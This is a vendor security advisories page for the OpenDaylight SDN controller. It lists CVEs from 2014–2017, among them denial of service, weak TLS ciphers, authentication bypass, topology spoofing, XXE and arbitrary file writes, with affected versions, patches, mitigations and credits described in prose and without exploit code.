Jump to: navigation, search

Security:Advisories

This page lists all security vulnerabilities fixed in OpenDaylight. Each vulnerability is assigned a security impact rating on a four-point scale (low, moderate, important and critical). The versions that are affected by each vulnerability are also listed.

Contents

[Moderate] CVE-2017-1000357 Denial of Service attack when the switch rejects to receive packets from the controller

Description

This vulnerability affects OpenDaylight odl-l2switch-switch, which is a feature that can provide OpenFlow-based communication.

Affected versions

  • Lithium (all SRs, will not be patched)
  • Beryllium (all SRs, will not be patched)
  • Boron

Patch commit(s)

  • TBA

Mitigations

Restricting access to the management network to ensure that only known, trusted devices can connect to the OpenFlow ports of OpenDaylight should minimize or eliminate the risk.

Credit

[Moderate] CVE-2017-1000358 Controller throws an exception and does not allow user to add subsequent flow for a particular switch

Description

OpenDaylight odl-restconf feature contains this flaw.

Affected versions

  • Beryllium (all SRs, will not be patched)
  • Boron

Patch commit(s)

  • TBA

Mitigations

Ensuring that only restricted users can add flows to devices and that they do not repeatedly add the same flow should minimize or eliminate risk of the attack.

Credit

Reported by Andi Bidaj here: https://aaltodoc.aalto.fi/bitstream/handle/123456789/21584/master_Bidaj_Andi_2016.pdf

[Low] CVE-2017-1000359 Java out of memory error and significant increase in resource consumption

Description

OpenDaylight odl-mdsal-xsql is vulnerable to this flaw.

Affected versions

  • Lithium (all SRs, will not be patched)
  • Beryllium (all SRs, will not be patched)
  • Boron <= SR2 (patched in SR3)

Patch commit(s)

Mitigations

Restricting access to ports 40004 and 34343 to ensure only trusted entities can send data to the XSQL service should minimize or eliminate the risk.

Credit

Reported by Andi Bidaj here: https://aaltodoc.aalto.fi/bitstream/handle/123456789/21584/master_Bidaj_Andi_2016.pdf

[Low] CVE-2017-1000360 StreamCorruptedException and NullPointerException in OpenDaylight odl-mdsal-xsql

Description

Controller launches exceptions in the console. Component: OpenDaylight odl-mdsal-xsql is vulnerable to this flaw.

Affected versions

  • Lithium (all SRs, will not be patched)
  • Beryllium (all SRs, will not be patched)
  • Boron <= SR2 (patched in SR3)

Patch commit(s)

Mitigations

Restricting access to ports 40004 and 34343 to ensure only trusted entities can send data to the XSQL service should minimize or eliminate the risk.

Credit

Reported by Andi Bidaj here: https://aaltodoc.aalto.fi/bitstream/handle/123456789/21584/master_Bidaj_Andi_2016.pdf

[Moderate] CVE-2017-1000361 DOMRpcImplementationNotAvailableException when sending Port-Status packets to OpenDaylight

Description

Controller launches exceptions and consumes more CPU resources. Component: OpenDaylight is vulnerable to this flaw.

Affected versions

  • Lithium (all SRs, will not be patched)
  • Beryllium (all SRs, will not be patched)
  • Boron

Patch commit(s)

  • TBA

Mitigations

Restricting access to the management network to ensure that only known, trusted devices can connect to the OpenFlow ports of OpenDaylight should minimize or eliminate the risk.

Credit

Reported by Andi Bidaj here: https://aaltodoc.aalto.fi/bitstream/handle/123456789/21584/master_Bidaj_Andi_2016.pdf

[Moderate] CVE-2016-2183 The DES/3DES cipher used as part of TLS/SSL protocol is not secure

Description

A flaw was found in the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite.

Affected versions

OpenDaylight Helium (all versions). OpenDaylight Lithium (all versions). OpenDaylight Beryllium (all versions). OpenDaylight Boron & Boron SR1.

Patch commit(s)

Patched Versions

The Boron SR2 release will fix this vulnerability.

Credit

This issue was reported to the OpenDaylight security team and fixed by Ryan Goulding.

[Important] CVE-2016-4970 netty: unspecified vulnerability leading to denial of service

Description

OpenDaylight includes netty as a dependency. An unspecified vulnerability was found in netty, leading to a remote denial of service (DoS).

Affected versions

All releases of OpenDaylight Beryllium are vulnerable.

Patch commit(s)

Patched Versions

The Beryllium SR3 release will include a patch for this issue.

[Critical] CVE-2015-7501 commons-collections: remote code execution due to insecure deserialization

Description

OpenDaylight includes Apache commons-collections as a dependency of karaf. It was found that some commons-collections classes could allow an attacker to achieve remote code execution upon deserialization. This is only exploitable if an interface deserializes arbitrary user-supplied content, and the vulnerable classes are on the classpath. While OpenDaylight includes the vulnerable classes, it does NOT expose any interface that deserializes arbitrary user-supplied content, and is NOT AFFECTED by this vulnerability.

Affected versions

OpenDaylight is not affected by this vulnerability. The vulnerable classes are being patched as a hardening measure, as tracked here: https://bugs.opendaylight.org/show_bug.cgi?id=4668

[Moderate] CVE-2015-3414 CVE-2015-3416 AAA: SQLite memory corruption leading to DoS and possible code execution

Description

The Helium release of AAA uses SQL statements assembled using string concatenation of user-supplied variables. This theoretically exposes an SQL injection vulnerability, but testing has revealed no cases that could cross a trust boundary and be useful to an attacker. However, as a result of allowing users to directly manipulate SQL statements, AAA exposes two underlying memory corruption vulnerabilities in SQLite (CVE-2015-3414 and CVE-2015-3416). Another vulnerability in SQLite was also reported (CVE-2015-3415), but AAA does not expose this vulnerability, because it relies on injection of DDL and AAA only allows an attacker to inject DML.

Affected versions

All releases of OpenDaylight Helium are vulnerable.

Patch commit(s)

Patched Versions

The Lithium GA release includes a patch for these issues. You can download it here:

https://nexus.opendaylight.org/content/groups/public/org/opendaylight/integration/distribution-karaf/0.3.0-Lithium/

The Helium SR4 release may include a patch for these issues, and a bug has been filed to track development of a patch.

Credit

This issue was reported to the OpenDaylight security team by Ryan Goulding.

[Moderate] CVE-2015-4000 OpenDaylight: TLS connections which support export grade DHE key-exchange are vulnerable to MITM attacks (LOGJAM)

Description

It was found that various TLS interfaces exposed by OpenDaylight were affected by the LOGJAM vulnerability. A man-in-the-middle attacker could use this flaw to perform a variety of attacks, potentially leading to the trivial decryption of ciphertext.

Affected versions

All releases of OpenDaylight Helium are vulnerable.

Patch commit(s)

Patched Versions

The Lithium GA release includes a patch for this issue. You can download it here:

https://nexus.opendaylight.org/content/groups/public/org/opendaylight/integration/distribution-karaf/0.3.0-Lithium/

The Helium SR4 release will include a patch for this issue.

Credit

This issue was reported to the OpenDaylight security team by Randy Randhawa.

[Low] CVE-2015-1857 MD-SAL: information disclosure

Description

It was found that the OpenDaylight MD-SAL API docs did not require authentication. The API docs contain potentially sensitive information, such as which devices are mounted on the server. A remote, unauthenticated attacker could use this flaw to gain information about the OpenDaylight server that could assist in the exploitation of another vulnerability.

Affected versions

All releases of OpenDaylight Helium are vulnerable.

Patch commit(s)

Patched Versions

The Helium SR4 release will include a patch for this issue. Given its low impact, a patch asynchronous to the existing release schedule will not be produced.

Credit

This issue was reported by Ryan Goulding.

[Important] CVE-2015-1778 OpenDaylight: authentication bypass

Description

It was found that the custom authentication realm used by karaf-tomcat's "opendaylight" realm would authenticate any username and password combination. The custom realm is work-in-progress code that is not yet suitable for production use. A remote attacker could use this flaw to access interfaces secured using the opendaylight realm, such as the northbound neutron API. The opendaylight realm has been updated to use UserDatabaseRealm, which reads credentials from the tomcat-users.xml file.

This issue does not affect the Lithium branch.

Affected versions

All releases of OpenDaylight Helium are vulnerable.

Patch commit(s)

Patched Versions

The Helium SR3 release includes a patch for this issue. You can download it here:

https://nexus.opendaylight.org/content/repositories/public/org/opendaylight/integration/distribution-karaf/0.2.3-Helium-SR3/

Credit

This issue was reported by Flavio Fernandes of Red Hat.

[Moderate] CVE-2015-1611 CVE-2015-1612 openflowplugin: topology spoofing via LLDP

Description

It has been reported that it is possible for an attacker to spoof network topology via LLDP. An attacker can inject crafted LLDP packets that announce internal links between switches, thereby affecting the flow of data in the SDN network. Further technical details are available in a conference paper.

Affected versions

All releases of openflowplugin are vulnerable.

Patch commit(s)

Patched Versions

The Helium SR3 release includes a patch for this issue. You can download it here:

https://nexus.opendaylight.org/content/repositories/public/org/opendaylight/integration/distribution-karaf/0.2.3-Helium-SR3/

Note that the patch does not prevent an attacker capable of acting as a man-in-the-middle from exploiting this issue.

Credit

This issue was reported by Lei Xu of Texas A&M.

[Moderate] CVE-2015-1610 l2switch: topology spoofing via hosttracker

Description

It has been reported that it is possible for an attacker to spoof network topology via hosttracker. An attacker can abuse hosttracker by updating the host location information without any validation, authentication or authorization. This makes it possible to impersonate other networking devices by obtaining their MAC address. This issue is related to well-known MAC spoofing attacks. Further technical details are available in a conference paper.

Affected versions

All releases of l2switch are vulnerable.

Patch commit(s)

Patches are still under development.

Patched Versions

Patched builds are not yet available. A bug has been filed to track the development of patches.

Credit

This issue was reported by Lei Xu of Texas A&M.

[Moderate] CVE-2014-8149 defense4all: users can export report data to an arbitrary file on the server's filesystem

Description

It was found that the defense4all framework's "dump" method allows a user to request that report data is exported to a file on the server's filesystem. The user can specify any path, and the server will write to it with no validation. This could be used to perform a range of attacks. For example, a critical file could be overwritten, thereby disabling the defense4all server. On Windows servers, a UNC path could be injected, potentially causing the server to write data to remote filesystems. An attacker cannot control the contents of the file, but they can define a report query that returns no results, and therefore force it to write an empty file. An error message is received if the server cannot write to the provided path. An attacker could therefore use this issue to map out the writable filesystem on the server and potentially perform more advanced attacks by manipulating special files in the /dev and /proc filesystems of Linux servers.

It was also found that defense4all was using Spring 3.0.0 RC3. This component is vulnerable to a number of vulnerabilities as listed on the pivotal advisories page: http://www.pivotal.io/security

Affected versions

All releases of defense4all <= 1.1.0 built before 15 Jan 2015 are vulnerable.

Patch commit(s)

Patched Versions

Builds of defense4all on or after 15 Jan 2015 contain a patch for these issues:

https://jenkins.opendaylight.org/defense4all/job/defense4all-merge/

Please note that older builds of defense4all 1.1.0 may be vulnerable, ensure you use a build from on or after 15 Jan 2015.

Credit

These issues were reported by David Jorm of IIX.

[Important] CVE-2014-5035 netconf: XML eXternal Entity (XXE) vulnerability

Description

It was found that OpenDaylight's netconf implementation did not disable external entities when processing user-supplied XML documents. A remote attacker, if able to interact with one of OpenDaylight's netconf interfaces, could use this flaw to exfiltrate files on the OpenDaylight controller, and potentially perform more advanced XXE attacks.

Affected versions

OpenDaylight Helium GA and SR1 are both affected.

Patch commit(s)

Patched Versions

You can download Helium-SR1.1 which has the patches listed with stable/helium applied here:

https://nexus.opendaylight.org/content/repositories/public/org/opendaylight/integration/distribution-karaf/0.2.1-Helium-SR1.1/

Credit

This issue was reported by Gregory Pickett of Hellfire Security.